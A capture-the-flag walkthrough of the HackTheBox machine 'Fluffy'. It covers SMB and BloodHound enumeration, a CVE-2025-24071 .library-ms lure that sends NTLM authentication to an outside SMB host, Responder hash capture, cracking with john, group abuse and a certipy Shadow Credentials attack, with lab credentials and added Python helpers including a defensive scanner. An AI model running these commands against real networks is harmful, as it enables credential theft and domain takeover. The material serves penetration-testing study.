
HackTheBox - Fluffy

Fluffy starts with the enumeration of SMB shares to reach a PDF that documents vulnerabilities in the system. One of them made it possible to leak an NTLM hash through a compressed .library-ms file. The BloodHound analysis shows GenericAll and GenericWrite permissions for one user, which allowed a Shadow Credentials attack against multiple users to gain access over WinRM. Finally, a template vulnerable to ESC16 was identified and exploited to escalate privileges.

Name: Fluffy
OS: Windows
Points: 20
Difficulty: Easy
Release date: 2025-05-24
IP: 10.10.11.69
Makers: ruycr4ft, kavigihan
Rated: user-rated difficulty histogram (Cake 147, VeryEasy 169, Easy 716, TooEasy 799, Medium 553, BitHard 288, Hard 214, TooHard 77, ExHard 23, BrainFuck 57)

Machine Information: Certified

The machine description emulates a "real" pentest scenario by providing credentials up front.

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Recon

nmap

nmap shows multiple open ports: DNS (53), SMB (139, 445), LDAP (389), WinRM (5985).

# Nmap 7.95 scan initiated Sun May 25 03:05:51 2025 as: /usr/lib/nmap/nmap --privileged -p53,139,389,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49681,49698,49706,49739 -sV -sC -oN nmap_scan 10.10.11.69
Nmap scan report for 10.10.11.69
Host is up (0.13s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=5/25%Time=6832C165%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-25T14:09:26
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h02m34s, deviation: 0s, median: 7h02m34s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 25 03:07:28 2025 -- 1 IP address (1 host up) scanned in 97.38 seconds

We add the entries fluffy.htb and dc01.fluffy.htb to our /etc/hosts file.

Service Access

The credentials have access to the SMB and LDAP services.

❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
❯ netexec ldap 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 

Bloodhound & Analysis

We run bloodhound-ce with the known credentials.

❯ ~/htb/tools/bloodhound-ce/bloodhound.py -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250525110540_bloodhound.zip

We create a wordlist based on the BloodHound user list.

❯ unzip 20250525110540_bloodhound.zip 20250525110540_users.json
Archive:  20250525110540_bloodhound.zip
 extracting: 20250525110540_users.json  
❯ jq -r '.data[].Properties.name' *users.json | tail -n +2 |  awk '{ print tolower($0) }' | cut -d '@' -f1 > users.txt
❯ wc -l users.txt
9 users.txt
❯ cat users.txt
j.fleischman
j.coffey
winrm_svc
p.agila
ldap_svc
ca_svc
krbtgt
guest
administrator
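
The same extraction done in Python, as an added example that is not part of the original writeup: it reads the `data[].Properties.name` field that the jq pipeline above uses, lowercases and strips the domain, and additionally drops duplicates and (optionally) principals from a domain other than the one being assessed. The JSON below is a constructed sample in that shape, not the real 20250525110540_users.json.

```python
import json
from typing import List, Optional

# Constructed sample in the shape bloodhound.py writes to *_users.json
# (only the "data[].Properties.name" field the pipeline reads is modelled;
# the real file carries many more properties per object).
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "J.FLEISCHMAN@FLUFFY.HTB"}},
        {"Properties": {"name": "P.AGILA@FLUFFY.HTB"}},
        {"Properties": {"name": "WINRM_SVC@FLUFFY.HTB"}},
        {"Properties": {"name": "GUEST@FLUFFY.HTB"}},
        {"Properties": {"name": "SVC_BACKUP@OTHER.HTB"}},   # foreign-domain principal (constructed)
        {"Properties": {"name": "P.AGILA@FLUFFY.HTB"}},     # duplicate on purpose
        {"Properties": {}},                                  # object without a name
    ],
    "meta": {"type": "users", "count": 7},
})


def usernames_from_bloodhound(raw_json: str, domain: Optional[str] = None) -> List[str]:
    """Turn a bloodhound.py users.json into a lowercase username list.

    Mirrors the jq | awk | cut pipeline from the writeup (lowercase, keep the
    part before '@') and adds two things that pipeline lacks: duplicates are
    dropped and, when `domain` is given, principals from other domains are
    skipped so objects from a trusted domain do not end up in the list.
    """
    doc = json.loads(raw_json)
    seen = set()
    users: List[str] = []
    for entry in doc.get("data", []):
        name = entry.get("Properties", {}).get("name")
        if not name or "@" not in name:
            continue  # no UPN-style name: nothing usable
        user, _, dom = name.lower().partition("@")
        if domain and dom != domain.lower():
            continue
        if user not in seen:
            seen.add(user)
            users.append(user)
    return users


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_USERS_JSON
    print("\n".join(usernames_from_bloodhound(raw, domain="fluffy.htb")))
```

Run it with the path to the extracted users.json as the first argument; without arguments it processes the embedded sample.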

Users

We find eight users within the Domain Users group.


winrm_svc

winrm_svc can access the machine over WinRM and also belongs to the Service Accounts group.


Through the Service Accounts group it has GenericWrite permissions over ca_svc and ldap_svc.


p.agila

p.agila, through the Service Account Managers group, has GenericAll permissions over the Service Accounts group.


And through the Service Accounts group it has GenericWrite permissions over ca_svc, ldap_svc and winrm_svc.


Service Accounts - ldap_svc & ca_svc

Both ldap_svc and ca_svc have GenericWrite permissions over the users that belong to the Service Accounts group.


ca_svc

This user can publish certificates in AD because it belongs to the Cert Publishers group.


j.fleischman

Apart from Certificate Service DCOM Access, j.fleischman shows no other relevant group.


Everything indicates that we need to obtain credentials or access for p.agila or for one of the service account users.

SMB - Files IT Share

We observe that j.fleischman has read and write access to the IT share.

❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 

We enumerate files with netexec's spider_plus module.

❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' -M spider_plus
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.69     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.69     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.69     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.11.69     445    DC01             [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/10.10.11.69.json".
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Shares:           6 (ADMIN$, C$, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Writable Shares:  1 (IT)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Total folders found:  23
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Total files found:    13
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size average:    635.72 KB
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size min:        23 B
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size max:        3.08 MB

We find that there are three files within the IT share.

❯ cat /home/kali/.nxc/modules/nxc_spider_plus/10.10.11.69.json | jq '.IT | keys'
[
  "Everything-1.4.1.1026.x64.zip",
  "Everything-1.4.1.1026.x64/Everything.lng",
  "Everything-1.4.1.1026.x64/everything.exe",
  "KeePass-2.58.zip",
  "Upgrade_Notice.pdf"
]

We download the files with --get-file, specifying the file name, the output path and the share.

❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file Everything-1.4.1.1026.x64.zip files/Everything-1.4.1.1026.x64.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "Everything-1.4.1.1026.x64.zip" to "files/Everything-1.4.1.1026.x64.zip"
SMB         10.10.11.69     445    DC01             [+] File "Everything-1.4.1.1026.x64.zip" was downloaded to "files/Everything-1.4.1.1026.x64.zip"
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file KeePass-2.58.zip files/KeePass-2.58.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "KeePass-2.58.zip" to "files/KeePass-2.58.zip"
SMB         10.10.11.69     445    DC01             [+] File "KeePass-2.58.zip" was downloaded to "files/KeePass-2.58.zip"
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file Upgrade_Notice.pdf files/Upgrade_Notice.pdf --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "Upgrade_Notice.pdf" to "files/Upgrade_Notice.pdf"
SMB         10.10.11.69     445    DC01             [+] File "Upgrade_Notice.pdf" was downloaded to "files/Upgrade_Notice.pdf"

Software

The KeePass archive only contains the software; we do not find any database.

❯ unzip KeePass-2.58.zip -d keepassfolder
Archive:  KeePass-2.58.zip
  inflating: keepassfolder/KeePass.chm  
  inflating: keepassfolder/KeePass.exe  
  inflating: keepassfolder/KeePass.exe.config  
  inflating: keepassfolder/KeePass.XmlSerializers.dll  
  inflating: keepassfolder/KeePassLibC32.dll  
  inflating: keepassfolder/KeePassLibC64.dll  
   creating: keepassfolder/Languages/
  inflating: keepassfolder/License.txt  
   creating: keepassfolder/Plugins/
  inflating: keepassfolder/ShInstUtil.exe  
   creating: keepassfolder/XSL/
  inflating: keepassfolder/XSL/KDBX_Common.xsl  
  inflating: keepassfolder/XSL/KDBX_DetailsFull_HTML.xsl  
  inflating: keepassfolder/XSL/KDBX_DetailsLight_HTML.xsl  
  inflating: keepassfolder/XSL/KDBX_PasswordsOnly_TXT.xsl  
  inflating: keepassfolder/XSL/KDBX_Tabular_HTML.xsl  
❯ cat KeePass.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
	<startup useLegacyV2RuntimeActivationPolicy="true">
		<supportedRuntime version="v4.0" />
		<supportedRuntime version="v2.0.50727" />
	</startup>
	<runtime>
		<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
			<dependentAssembly>
				<assemblyIdentity name="KeePass"
					publicKeyToken="fed2ed7716aecf5c"
					culture="neutral" />
				<bindingRedirect oldVersion="2.0.9.0-2.57.127.127"
					newVersion="2.58.0.0" />
			</dependentAssembly>
		</assemblyBinding>
		<enforceFIPSPolicy enabled="false" />
		<loadFromRemoteSources enabled="true" />
	</runtime>
	<appSettings>
		<add key="EnableWindowsFormsHighDpiAutoResizing" value="true" />
	</appSettings>
</configuration>

Everything as well, only the software.

❯ unzip Everything-1.4.1.1026.x64.zip -d everything
Archive:  Everything-1.4.1.1026.x64.zip
  inflating: everything/everything.exe  
  inflating: everything/Everything.lng  
❯ file *
everything.exe: PE32+ executable for MS Windows 5.02 (GUI), x86-64, 6 sections
Everything.lng: data

Notice PDF

In the PDF file's metadata we find a username, p.agila.

❯ exiftool Upgrade_Notice.pdf
ExifTool Version Number         : 13.25
File Name                       : Upgrade_Notice.pdf
Directory                       : .
File Size                       : 170 kB
File Modification Date/Time     : 2025:05:25 03:39:24-04:00
File Access Date/Time           : 2025:05:29 02:57:05-04:00
File Inode Change Date/Time     : 2025:05:25 03:39:24-04:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 2
Tagged PDF                      : Yes
Language                        : en
Title                           : Upgrade Notice For IT Department
Create Date                     : 2025:05:17 07:22:32+00:00
Modify Date                     : 2025:05:17 07:22:32+00:00
Keywords                        : DAGnmrYlJoI, BAF-XVRpOno, 0
Author                          : p.agila

In addition, the content shows a list of vulnerabilities that must be patched.

- CVE-2025-24996
- CVE-2025-24071
- CVE-2025-46785
- CVE-2025-29968
- CVE-2025-21193
- CVE-2025-3445

CVE-2025-24071

CVE-2025-24071 is explained: it is possible to leak the NTLM hash through a .library-ms file that contains the address of an SMB server (\\10.10.10.10\share\), compressed in a rar/zip archive.

The .library-ms file has an XML structure; once Windows Explorer's indexing service parses it, the attack succeeds.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription
	xmlns="http://schemas.microsoft.com/windows/2009/library">
	<searchConnectorDescriptionList>
		<searchConnectorDescription>
			<simpleLocation>
				<url>\\\\10.10.10.10\\shared</url>
			</simpleLocation>
		</searchConnectorDescription>
	</searchConnectorDescriptionList>
</libraryDescription>
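
From the defender's side, the structure above is also what a scanner needs to look for: any `<simpleLocation><url>` that resolves to a UNC path is a host the client will authenticate to as soon as Explorer indexes the library. The following is an added example (not code from the writeup or from the PoC repository) that parses .library-ms documents, extracts those locations and flags UNC targets outside an allowlist, and does the same for every .library-ms member of a zip archive, which is the delivery vehicle the page describes. The two XML documents and the archive are constructed samples; the UNC path is written the way it is stored in the file (`\\host\share`), not in the doubled form the PoC source shows.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Optional, Union

# Namespace of the libraryDescription root element, taken from the XML above.
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed samples: a library pointing at a local folder and one pointing
# at an external SMB host.
BENIGN_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

SUSPICIOUS_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\10.10.10.10\\shared</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def library_urls(xml_data: Union[bytes, str]) -> List[str]:
    """Extract every <simpleLocation><url> value from a .library-ms document."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    urls = []
    for loc in root.iter(LIBRARY_NS + "simpleLocation"):
        url = loc.find(LIBRARY_NS + "url")
        if url is not None and url.text:
            urls.append(url.text.strip())
    return urls


def unc_host(url: str) -> Optional[str]:
    """Host part of a UNC path written as \\\\host\\share or //host/share, else None."""
    normalized = url.replace("/", "\\")
    if not normalized.startswith("\\\\"):
        return None
    host = normalized[2:].split("\\", 1)[0]
    return host or None


def scan_library_ms(xml_data: Union[bytes, str], allowed_hosts: Iterable[str] = ()) -> List[str]:
    """Return the location URLs that point at a network host outside allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for url in library_urls(xml_data):
        host = unc_host(url)
        if host is not None and host.lower() not in allowed:
            findings.append(url)
    return findings


def scan_zip(zip_bytes: bytes, allowed_hosts: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Scan every .library-ms member of a zip archive; {member name: [suspicious urls]}."""
    report: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                hits = scan_library_ms(zf.read(info), allowed_hosts)
            except ET.ParseError:
                hits = ["<unparseable XML>"]  # malformed member: surface it rather than skip it
            if hits:
                report[info.filename] = hits
    return report


def build_sample_zip() -> bytes:
    """Constructed archive holding both samples so the scanner runs stand-alone."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs.library-ms", BENIGN_LIBRARY_MS)
        zf.writestr("invoice.library-ms", SUSPICIOUS_LIBRARY_MS)
        zf.writestr("readme.txt", "not a library file")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_zip()
    # fs01.fluffy.htb is a constructed allowlist entry, not a host from the box.
    for member, urls in scan_zip(data, allowed_hosts=["fs01.fluffy.htb"]).items():
        print(f"{member}: {', '.join(urls)}")
```

Pointing the script at archives uploaded to a writable share (the IT share in this box is exactly such a drop point) gives a cheap check for this delivery pattern; the allowlist keeps legitimate file servers from being reported.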

We clone the PoC listed in the post locally.

❯ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.
❯ cd CVE-2025-24071_PoC
❯ ll
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025  poc.py
.rw-rw-r-- kali kali  966 B Thu May 29 03:12:56 2025  README.md

We run it, specifying the file name and the IP address.

❯ python poc.py
Enter your file name: sckull
Enter IP (EX: 192.168.1.162): 10.10.14.58
completed
❯ ll
.rw-rw-r-- kali kali  320 B Thu May 29 03:14:15 2025  exploit.zip
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025  poc.py
.rw-rw-r-- kali kali  966 B Thu May 29 03:12:56 2025  README.md

We run responder, specifying our interface.

❯ sudo responder -I tun0 -wF
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [ON]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.58]
    Responder IPv6             [dead:beef:2::1038]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-A27FEBQU5KE]
    Responder Domain Name      [ZEUH.LOCAL]
    Responder DCE-RPC Port     [46470]

[+] Listening for events...

We upload the file through netexec with the --put-file flag, specifying the share.

❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --put-file exploit.zip exploit.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying exploit.zip to exploit.zip
SMB         10.10.11.69     445    DC01             [+] Created file exploit.zip on \\IT\exploit.zip

After a few seconds responder shows that it captured p.agila's hash.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:5f2c4cd66f7e65f…
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila

Cracking the Hash

We run john with the rockyou.txt wordlist against responder's hash file for the address 10.10.11.69 and obtain the plaintext value.

❯ john SMB-NTLMv2-SSP-10.10.11.69.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 21 password hashes with 21 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
21g 0:00:00:23 DONE (2025-05-25 11:54) 0.8947g/s 192496p/s 4042Kc/s 4042KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

User - p.agila

The credentials give us access over SMB and LDAP.

❯ netexec smb 10.10.11.69 -u p.agila -p 'prometheusx-303'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\p.agila:prometheusx-303 
❯ netexec ldap 10.10.11.69 -u p.agila -p 'prometheusx-303'
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:prometheusx-303 

One of the users of interest is ca_svc, since with it we could run Certipy and check for vulnerable templates.

GenericAll -> Service Accounts

We add p.agila to the Service Accounts group.

# add p.agila to service accounts
pth-net rpc group addmem "Service Accounts" p.agila -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69

Shadow Credentials

With the GenericWrite permission we can obtain the user's hash by performing a Shadow Credentials attack with certipy. We run this attack for the three users in the Service Accounts group, starting with the ca_svc user.

# GenericWrite on ca_svc, ldap_svc, winrm_svc
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ca_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8'
[*] Adding Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
